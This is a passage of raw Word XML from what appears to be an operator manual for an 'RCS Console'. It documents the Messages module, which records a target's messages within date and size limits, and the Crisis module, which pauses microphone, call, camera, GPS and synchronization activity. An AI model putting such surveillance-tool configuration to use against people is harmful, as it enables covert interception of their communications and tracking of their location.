            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00DF782C" w:rsidRDefault="003A4380" w:rsidP="006954F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:eastAsia="it-IT"/>
              </w:rPr>
              <w:object w:dxaOrig="1440" w:dyaOrig="1440">
                <v:shape id="_x0000_s1334" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:470.25pt;height:200.25pt;z-index:251853824;mso-position-horizontal:left;mso-position-horizontal-relative:margin;mso-position-vertical:top;mso-position-vertical-relative:margin">
                  <v:imagedata r:id="rId322" o:title=""/>
                  <w10:wrap type="square" anchorx="margin" anchory="margin"/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_s1334" DrawAspect="Content" ObjectID="_1446455396" r:id="rId323"/>
              </w:object>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DF782C" w:rsidRPr="00087607" w:rsidRDefault="00732ABF" w:rsidP="00732ABF">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>8.32</w:t>
            </w:r>
            <w:r w:rsidR="006F1279">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="006F1279" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="006F1279">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> RCS </w:t>
            </w:r>
            <w:r w:rsidR="006F1279" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Console ] </w:t>
            </w:r>
            <w:r w:rsidR="006F1279">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Operations &gt; </w:t>
            </w:r>
            <w:r w:rsidR="006F1279" w:rsidRPr="00674013">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:r w:rsidR="006F1279">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>O</w:t>
            </w:r>
            <w:r w:rsidR="006F1279" w:rsidRPr="00674013">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>peration #</w:t>
            </w:r>
            <w:r w:rsidR="006F1279">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="006F1279">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">&gt; </w:t>
            </w:r>
            <w:r w:rsidR="006F1279" w:rsidRPr="0059452D">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t># Target #</w:t>
            </w:r>
            <w:r w:rsidR="006F1279">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="006F1279">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">&gt; </w:t>
            </w:r>
            <w:r w:rsidR="006F1279" w:rsidRPr="0059452D">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:r w:rsidR="006F1279">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Factory</w:t>
            </w:r>
            <w:r w:rsidR="006F1279" w:rsidRPr="0059452D">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> #</w:t>
            </w:r>
            <w:r w:rsidR="006F1279">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> &gt; Module (Messages)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00DF782C" w:rsidRDefault="00DF782C" w:rsidP="00DF782C"/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Grigliatabella"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="-10" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9628"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DF782C" w:rsidTr="006F1279">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9628" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="006F1279" w:rsidRPr="006F1279" w:rsidRDefault="006F1279" w:rsidP="006F1279">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006F1279">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="006F1279">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Enabled</w:t>
            </w:r>
            <w:r w:rsidRPr="006F1279">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] (1) (2) (3) enables messages recording.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006F1279" w:rsidRPr="006F1279" w:rsidRDefault="006F1279" w:rsidP="006F1279">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="006F1279" w:rsidRPr="006F1279" w:rsidRDefault="006F1279" w:rsidP="006F1279">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006F1279">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="006F1279">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>From</w:t>
            </w:r>
            <w:r w:rsidRPr="006F1279">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] (1) (2) (3) records messages starting from the specified date.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006F1279" w:rsidRPr="006F1279" w:rsidRDefault="006F1279" w:rsidP="006F1279">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="006F1279" w:rsidRPr="006F1279" w:rsidRDefault="006F1279" w:rsidP="006F1279">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006F1279">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="006F1279">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>To</w:t>
            </w:r>
            <w:r w:rsidRPr="006F1279">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] (1) (2) (3) records messages up to the specified date.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006F1279" w:rsidRPr="006F1279" w:rsidRDefault="006F1279" w:rsidP="006F1279">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00DF782C" w:rsidRPr="006F1279" w:rsidRDefault="006F1279" w:rsidP="006954F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006F1279">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="006F1279">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Max size</w:t>
            </w:r>
            <w:r w:rsidRPr="006F1279">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] (1) (2) (3) is the maximum size</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> of the message to be recorded.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="006F1279" w:rsidRDefault="006F1279">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Grigliatabell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6"/>
        <w:gridCol w:w="283"/>
        <w:gridCol w:w="6069"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D641D7" w:rsidTr="006F1279">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3276" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="006F1279" w:rsidRPr="006F1279" w:rsidRDefault="003A4380" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:object w:dxaOrig="1440" w:dyaOrig="1440">
                <v:shape id="_x0000_s1506" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:2in;height:189.75pt;z-index:251877376;mso-position-horizontal:left;mso-position-horizontal-relative:margin;mso-position-vertical:top;mso-position-vertical-relative:margin">
                  <v:imagedata r:id="rId324" o:title=""/>
                  <w10:wrap type="square" anchorx="margin" anchory="margin"/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_s1506" DrawAspect="Content" ObjectID="_1446455397" r:id="rId325"/>
              </w:object>
            </w:r>
          </w:p>
          <w:p w:rsidR="006F1279" w:rsidRDefault="00732ABF" w:rsidP="006F1279">
            <w:pPr>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>8.33</w:t>
            </w:r>
            <w:r w:rsidR="006F1279">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="006F1279" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="006F1279">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> RCS </w:t>
            </w:r>
            <w:r w:rsidR="006F1279" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Console ] </w:t>
            </w:r>
            <w:r w:rsidR="006F1279">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Operations &gt; </w:t>
            </w:r>
            <w:r w:rsidR="006F1279" w:rsidRPr="00674013">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:r w:rsidR="006F1279">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>O</w:t>
            </w:r>
            <w:r w:rsidR="006F1279" w:rsidRPr="00674013">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>peration #</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006F1279" w:rsidRPr="00A52C9B" w:rsidRDefault="006F1279" w:rsidP="006F1279">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">&gt; </w:t>
            </w:r>
            <w:r w:rsidRPr="0059452D">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t># Target #</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">&gt; </w:t>
            </w:r>
            <w:r w:rsidRPr="0059452D">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Factory</w:t>
            </w:r>
            <w:r w:rsidRPr="0059452D">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> #</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> &gt; Module (Crisis)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="283" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00D641D7" w:rsidRDefault="00D641D7" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6069" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00D641D7" w:rsidRPr="006F1279" w:rsidRDefault="00D641D7" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00D641D7" w:rsidRPr="006F1279" w:rsidRDefault="00D641D7" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00D641D7" w:rsidRPr="006F1279" w:rsidRDefault="00D641D7" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006F1279">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidR="007C4AE3" w:rsidRPr="006F1279">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Microphone</w:t>
            </w:r>
            <w:r w:rsidRPr="006F1279">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] </w:t>
            </w:r>
            <w:r w:rsidR="001E7A4B" w:rsidRPr="006F1279">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>if selected, it prevents Mic audio recording.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006F1279" w:rsidRPr="006F1279" w:rsidRDefault="006F1279" w:rsidP="006F1279">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00D641D7" w:rsidRPr="006F1279" w:rsidRDefault="00D641D7" w:rsidP="006F1279">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006F1279">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidR="007C4AE3" w:rsidRPr="006F1279">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Call</w:t>
            </w:r>
            <w:r w:rsidRPr="006F1279">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] </w:t>
            </w:r>
            <w:r w:rsidR="001E7A4B" w:rsidRPr="006F1279">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>if selected, it prevents Call audio recording.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006F1279" w:rsidRPr="006F1279" w:rsidRDefault="006F1279" w:rsidP="006F1279">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00D641D7" w:rsidRPr="006F1279" w:rsidRDefault="00D641D7" w:rsidP="006F1279">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006F1279">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidR="007C4AE3" w:rsidRPr="006F1279">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Camera</w:t>
            </w:r>
            <w:r w:rsidRPr="006F1279">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] </w:t>
            </w:r>
            <w:r w:rsidR="001E7A4B" w:rsidRPr="006F1279">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>if selected, it prevents Camera snapshots.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006F1279" w:rsidRPr="006F1279" w:rsidRDefault="006F1279" w:rsidP="006F1279">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00D641D7" w:rsidRPr="006F1279" w:rsidRDefault="00D641D7" w:rsidP="006F1279">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006F1279">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidR="007C4AE3" w:rsidRPr="006F1279">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Position</w:t>
            </w:r>
            <w:r w:rsidRPr="006F1279">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] </w:t>
            </w:r>
            <w:r w:rsidR="001E7A4B" w:rsidRPr="006F1279">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>if selected, it prevents GPS use.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006F1279" w:rsidRPr="006F1279" w:rsidRDefault="006F1279" w:rsidP="006F1279">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00D641D7" w:rsidRPr="006F1279" w:rsidRDefault="007C4AE3" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006F1279">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="006F1279">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Synchronization</w:t>
            </w:r>
            <w:r w:rsidRPr="006F1279">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] </w:t>
            </w:r>
            <w:r w:rsidR="001E7A4B" w:rsidRPr="006F1279">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>if selected, it prevents synchronization.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00D641D7" w:rsidRDefault="00D641D7" w:rsidP="00D641D7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007C4AE3" w:rsidRDefault="007C4AE3" w:rsidP="00D641D7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007C7B8A" w:rsidRDefault="007C7B8A" w:rsidP="00D641D7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
